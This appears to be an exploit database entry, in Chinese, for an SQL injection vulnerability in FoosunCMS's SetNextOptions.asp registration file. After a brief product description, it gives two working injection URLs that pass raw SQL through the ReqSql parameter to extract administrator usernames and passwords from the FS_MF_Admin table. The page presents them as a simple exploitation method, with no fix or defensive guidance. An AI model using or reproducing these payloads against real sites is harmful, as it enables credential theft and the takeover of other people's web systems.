风讯(FoosunCMS) SetNextOptions.asp注入漏洞利用



EKU-ID: 360 CVE: OSVDB-ID:
Author: expku Published: 2011-05-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


FoosunCMS是一款具有强大的功能的基于ASP+ACCESS/MSSQL构架的内容管理软件,国内领先的第一款开源的、集成web2.0元素的、模块化的CMS建站系统。
风讯foosun的注册文件存在漏洞,可以暴管理员帐号和密码。

漏洞文件:

    http://www.expku.com/user/SetNextOptions.asp

利用简单的方法:

暴管理员帐号:

    http://www.expku.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

暴管理员密码:

    http://www.expku.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin